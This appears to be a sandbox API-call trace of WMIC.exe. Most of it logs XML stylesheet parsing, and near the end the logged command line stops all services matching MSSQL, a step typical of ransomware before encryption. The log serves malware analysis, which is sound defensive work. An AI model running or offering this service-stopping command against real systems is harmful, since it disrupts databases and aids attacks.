(param_1="XML") returned 0x3 [0257.814] SysStringLen (param_1="XML") returned 0x3 [0257.814] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.814] malloc (_Size=0x18) returned 0x872a20 [0257.814] IUnknown:Release (This=0x776b88) returned 0x0 [0257.814] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.814] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.814] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=10, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.814] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="texttable.xsl") returned 0x0 [0257.814] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.814] malloc (_Size=0xc) returned 0x87aea0 [0257.815] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.815] free (_Block=0x87aea0) [0257.815] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0257.815] malloc (_Size=0xc) returned 0x87ae88 [0257.815] malloc (_Size=0xc) returned 0x87ae58 [0257.815] SysStringLen (param_1="texttablewsys") returned 0xd [0257.815] SysStringLen (param_1="TABLE") returned 0x5 [0257.815] SysStringLen (param_1="texttablewsys") returned 0xd [0257.815] SysStringLen (param_1="XML") returned 0x3 [0257.815] SysStringLen (param_1="texttablewsys") returned 0xd [0257.815] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.815] SysStringLen (param_1="XML") returned 0x3 [0257.815] SysStringLen (param_1="texttablewsys") returned 0xd [0257.815] malloc (_Size=0x18) returned 0x872a80 [0257.815] IUnknown:Release (This=0x776b88) returned 0x0 [0257.815] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.815] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.816] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=11, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.816] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="texttable.xsl") returned 0x0 [0257.816] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.816] malloc (_Size=0xc) returned 0x87ae40 [0257.816] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.816] free (_Block=0x87ae40) [0257.816] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0257.816] malloc (_Size=0xc) returned 0x87aeb8 [0257.816] malloc (_Size=0xc) returned 0x87aed0 [0257.816] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.816] SysStringLen (param_1="TABLE") returned 0x5 [0257.816] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.817] SysStringLen (param_1="XML") returned 0x3 [0257.817] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.817] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.817] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.817] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.817] malloc (_Size=0x18) returned 0x872ae0 [0257.818] IUnknown:Release (This=0x776b88) returned 0x0 [0257.818] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.818] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.818] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=12, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.818] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="texttable.xsl") returned 0x0 [0257.818] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.818] malloc (_Size=0xc) returned 0x87aea0 [0257.818] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.818] free (_Block=0x87aea0) [0257.819] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0257.819] malloc (_Size=0xc) returned 0x87ae70 [0257.819] malloc (_Size=0xc) returned 0x87ae10 [0257.819] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0257.819] SysStringLen (param_1="TABLE") returned 0x5 [0257.819] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0257.819] SysStringLen (param_1="XML") returned 0x3 [0257.819] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0257.819] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.819] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0257.819] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.819] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.819] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0257.819] malloc (_Size=0x18) returned 0x872ce0 [0257.819] IUnknown:Release (This=0x776b88) returned 0x0 [0257.819] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.819] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.819] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=13, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.820] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="texttable.xsl") returned 0x0 [0257.820] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.820] malloc (_Size=0xc) returned 0x87ae40 [0257.820] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.820] free (_Block=0x87ae40) [0257.820] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0257.820] malloc (_Size=0xc) returned 0x87ae40 [0257.820] malloc (_Size=0xc) returned 0x87aea0 [0257.820] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.820] SysStringLen (param_1="TABLE") returned 0x5 [0257.820] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.820] SysStringLen (param_1="XML") returned 0x3 [0257.820] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.820] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.820] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.821] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.821] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.821] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.821] malloc (_Size=0x18) returned 0x872d40 [0257.821] IUnknown:Release (This=0x776b88) returned 0x0 [0257.821] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.821] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.821] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=14, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.821] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="texttable.xsl") returned 0x0 [0257.821] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.821] malloc (_Size=0xc) returned 0x87ad50 [0257.821] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.822] free (_Block=0x87ad50) [0257.822] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0257.822] malloc (_Size=0xc) returned 0x87abb8 [0257.822] malloc (_Size=0xc) returned 0x87ab58 [0257.822] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0257.822] SysStringLen (param_1="TABLE") returned 0x5 [0257.822] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0257.822] SysStringLen (param_1="XML") returned 0x3 [0257.822] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0257.822] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.822] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0257.822] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.822] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0257.822] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.822] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.822] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0257.822] malloc (_Size=0x18) returned 0x8729a0 [0257.822] IUnknown:Release (This=0x776b88) returned 0x0 [0257.822] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.822] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.823] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=15, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.823] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="htable.xsl") returned 0x0 [0257.823] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.823] malloc (_Size=0xc) returned 0x87ad50 [0257.823] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.823] free (_Block=0x87ad50) [0257.823] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0257.823] malloc (_Size=0xc) returned 0x87ac18 [0257.823] malloc (_Size=0xc) returned 0x87abd0 [0257.823] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0257.824] SysStringLen (param_1="TABLE") returned 0x5 [0257.824] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0257.824] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.824] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0257.824] SysStringLen (param_1="XML") returned 0x3 [0257.824] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0257.824] SysStringLen (param_1="texttablewsys") returned 0xd [0257.824] SysStringLen (param_1="XML") returned 0x3 [0257.824] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0257.824] malloc (_Size=0x18) returned 0x872b60 [0257.824] IUnknown:Release (This=0x776b88) returned 0x0 [0257.824] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.824] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.824] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=16, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.824] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="htable.xsl") returned 0x0 [0257.824] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.824] malloc (_Size=0xc) returned 0x87ac30 [0257.825] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.825] free (_Block=0x87ac30) [0257.825] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0257.825] malloc (_Size=0xc) returned 0x87adb0 [0257.825] malloc (_Size=0xc) returned 0x87aca8 [0257.825] SysStringLen (param_1="htable-sortby") returned 0xd [0257.825] SysStringLen (param_1="TABLE") returned 0x5 [0257.825] SysStringLen (param_1="htable-sortby") returned 0xd [0257.825] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.825] SysStringLen (param_1="htable-sortby") returned 0xd [0257.825] SysStringLen (param_1="XML") returned 0x3 [0257.825] SysStringLen (param_1="htable-sortby") returned 0xd [0257.825] SysStringLen (param_1="texttablewsys") returned 0xd [0257.825] SysStringLen (param_1="htable-sortby") returned 0xd [0257.825] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0257.825] SysStringLen (param_1="XML") returned 0x3 [0257.825] SysStringLen (param_1="htable-sortby") returned 0xd [0257.825] malloc (_Size=0x18) returned 0x8729c0 [0257.826] IUnknown:Release (This=0x776b88) returned 0x0 [0257.826] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.826] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.826] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=17, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.826] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="mof.xsl") returned 0x0 [0257.826] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.826] malloc (_Size=0xc) returned 0x87ac60 [0257.826] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.826] free (_Block=0x87ac60) [0257.826] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0257.826] malloc (_Size=0xc) returned 0x87ad68 [0257.827] malloc (_Size=0xc) returned 0x87ac30 [0257.827] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0257.827] SysStringLen (param_1="TABLE") returned 0x5 [0257.827] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0257.827] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.827] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0257.827] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.827] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0257.827] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0257.827] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.827] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0257.827] malloc (_Size=0x18) returned 0x872b80 [0257.827] IUnknown:Release (This=0x776b88) returned 0x0 [0257.827] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.827] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.827] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=18, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.827] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="mof.xsl") returned 0x0 [0257.827] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.828] malloc (_Size=0xc) returned 0x87ad98 [0257.828] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.828] free (_Block=0x87ad98) [0257.828] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0257.828] malloc (_Size=0xc) returned 0x87ad20 [0257.828] malloc (_Size=0xc) returned 0x87ab40 [0257.828] SysStringLen (param_1="wmiclimofformat") returned 0xf [0257.828] SysStringLen (param_1="TABLE") returned 0x5 [0257.828] SysStringLen (param_1="wmiclimofformat") returned 0xf [0257.828] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.828] SysStringLen (param_1="wmiclimofformat") returned 0xf [0257.828] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.828] SysStringLen (param_1="wmiclimofformat") returned 0xf [0257.828] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0257.828] SysStringLen (param_1="wmiclimofformat") returned 0xf [0257.828] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0257.828] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.829] SysStringLen (param_1="wmiclimofformat") returned 0xf [0257.829] malloc (_Size=0x18) returned 0x872be0 [0257.829] IUnknown:Release (This=0x776b88) returned 0x0 [0257.829] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.829] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.829] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=19, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.829] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="textvaluelist.xsl") returned 0x0 [0257.829] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.829] malloc (_Size=0xc) returned 0x87abe8 [0257.829] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.829] free (_Block=0x87abe8) [0257.830] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0257.830] malloc (_Size=0xc) returned 0x87ac60 [0257.830] malloc (_Size=0xc) returned 0x87ad38 [0257.830] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0257.830] SysStringLen (param_1="TABLE") returned 0x5 [0257.830] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0257.830] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.830] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0257.830] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.830] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0257.830] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.830] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.830] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0257.830] malloc (_Size=0x18) returned 0x872c00 [0257.830] IUnknown:Release (This=0x776b88) returned 0x0 [0257.830] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.830] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.830] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=20, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.831] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="textvaluelist.xsl") returned 0x0 [0257.831] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.831] malloc (_Size=0xc) returned 0x87acd8 [0257.831] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.831] free (_Block=0x87acd8) [0257.831] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0257.831] malloc (_Size=0xc) returned 0x87acc0 [0257.831] malloc (_Size=0xc) returned 0x87adc8 [0257.831] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0257.831] SysStringLen (param_1="TABLE") returned 0x5 [0257.831] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0257.831] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.831] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0257.831] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.831] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0257.831] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.832] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0257.832] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0257.832] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.832] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0257.832] malloc (_Size=0x18) returned 0x8729e0 [0257.832] IUnknown:Release (This=0x776b88) returned 0x0 [0257.832] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.832] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.832] IUnknown:Release (This=0x779ca0) returned 0x0 [0257.832] FreeThreadedDOMDocument:IUnknown:Release (This=0x776b48) returned 0x1 [0257.832] FreeThreadedDOMDocument:IUnknown:Release (This=0x7745a8) returned 0x0 [0257.833] free (_Block=0x879898) [0257.833] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice" [0257.833] malloc (_Size=0xd0) returned 0x87aee8 [0257.833] memcpy_s (in: _Destination=0x87aee8, _DestinationSize=0xce, _Source=0x4d1b78, _SourceSize=0xca | out: _Destination=0x87aee8) returned 0x0 [0257.833] malloc (_Size=0xc) returned 0x87ad50 [0257.833] malloc (_Size=0xc) returned 0x87ad80 [0257.833] malloc (_Size=0xc) returned 0x87ac48 [0257.833] malloc (_Size=0xc) returned 0x87ac78 [0257.834] malloc (_Size=0x80) returned 0x87afc0 [0257.834] GetLocalTime (in: lpSystemTime=0x15fc4c | out: lpSystemTime=0x15fc4c*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1c, wSecond=0x17, wMilliseconds=0x379)) [0257.834] _vsnwprintf (in: _Buffer=0x87afc0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x15fc2c | out: _Buffer="04-02-2020T08:28:23") returned 19 [0257.834] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 66 [0257.834] malloc (_Size=0x86) returned 0x87b048 [0257.834] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 66 [0257.834] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 66 [0257.834] malloc (_Size=0x86) returned 0x87b730 [0257.834] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 66 [0257.834] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 66 [0257.834] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 66 [0257.834] malloc (_Size=0xa) returned 0x87ab28 [0257.834] lstrlenW (lpString="path") returned 4 [0257.834] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0257.835] malloc (_Size=0xa) returned 0x87ac90 [0257.835] malloc (_Size=0x4) returned 0x872ee8 [0257.835] free (_Block=0x0) [0257.835] free (_Block=0x87ab28) [0257.835] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 66 [0257.835] malloc (_Size=0x1c) returned 0x879da8 [0257.835] lstrlenW (lpString="Win32_Service") returned 13 [0257.835] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0257.835] malloc (_Size=0x1c) returned 0x870568 [0257.835] malloc (_Size=0x8) returned 0x870590 [0257.835] memmove_s (in: _Destination=0x870590, _DestinationSize=0x4, _Source=0x872ee8, _SourceSize=0x4 | out: _Destination=0x870590) returned 0x0 [0257.835] free (_Block=0x872ee8) [0257.835] free (_Block=0x0) [0257.835] free (_Block=0x879da8) [0257.835] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 66 [0257.835] malloc (_Size=0xc) returned 0x87abe8 [0257.835] lstrlenW (lpString="where") returned 5 [0257.836] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0257.836] malloc (_Size=0xc) returned 0x87ad98 [0257.836] malloc (_Size=0xc) returned 0x87acf0 [0257.836] memmove_s (in: _Destination=0x87acf0, _DestinationSize=0x8, _Source=0x870590, _SourceSize=0x8 | out: _Destination=0x87acf0) returned 0x0 [0257.836] free (_Block=0x870590) [0257.836] free (_Block=0x0) [0257.836] free (_Block=0x87abe8) [0257.836] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 66 [0257.836] malloc (_Size=0x30) returned 0x87c0e0 [0257.836] lstrlenW (lpString="\"name like '%%MSSQL%%'\"") returned 23 [0257.836] _wcsicmp (_String1="\"name like '%%MSSQL%%'\"", _String2="\"NULL\"") returned -20 [0257.836] lstrlenW (lpString="\"name like '%%MSSQL%%'\"") returned 23 [0257.836] lstrlenW (lpString="\"name like '%%MSSQL%%'\"") returned 23 [0257.836] malloc (_Size=0x30) returned 0x87c118 [0257.836] malloc (_Size=0x10) returned 0x87acd8 [0257.836] memmove_s (in: _Destination=0x87acd8, _DestinationSize=0xc, _Source=0x87acf0, _SourceSize=0xc | out: _Destination=0x87acd8) returned 0x0 [0257.836] free (_Block=0x87acf0) [0257.836] free (_Block=0x0) [0257.836] free (_Block=0x87c0e0) [0257.836] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 66 [0257.836] malloc (_Size=0xa) returned 0x87adf8 [0257.836] lstrlenW (lpString="call") returned 4 [0257.836] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0257.836] malloc (_Size=0xa) returned 0x87acf0 [0257.836] malloc (_Size=0x18) returned 0x872a40 [0257.836] memmove_s (in: _Destination=0x872a40, _DestinationSize=0x10, _Source=0x87acd8, _SourceSize=0x10 | out: _Destination=0x872a40) returned 0x0 [0257.836] free (_Block=0x87acd8) [0257.837] free (_Block=0x0) [0257.837] free (_Block=0x87adf8) [0257.837] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 66 [0257.837] malloc (_Size=0x18) returned 0x872b00 [0257.837] lstrlenW (lpString="stopservice") returned 11 [0257.837] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0257.837] malloc (_Size=0x18) returned 0x872b20 [0257.837] free (_Block=0x0) [0257.837] free (_Block=0x872b00) [0257.837] malloc (_Size=0x18) returned 0x872b00 [0257.837] lstrlenW (lpString="QUIT") returned 4 [0257.837] lstrlenW (lpString="path") returned 4 [0257.837] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0257.837] lstrlenW (lpString="EXIT") returned 4 [0257.837] lstrlenW (lpString="path") returned 4 [0257.837] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0257.837] free (_Block=0x872b00) [0257.837] WbemLocator:IUnknown:AddRef (This=0x4e48a8) returned 0x2 [0257.837] malloc (_Size=0x18) returned 0x872b00 [0257.837] lstrlenW (lpString="/") returned 1 [0257.837] lstrlenW (lpString="path") returned 4 [0257.837] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0257.837] lstrlenW (lpString="-") returned 1 [0257.837] lstrlenW (lpString="path") returned 4 [0257.837] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0257.837] lstrlenW (lpString="CLASS") returned 5 [0257.837] lstrlenW (lpString="path") returned 4 [0257.838] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 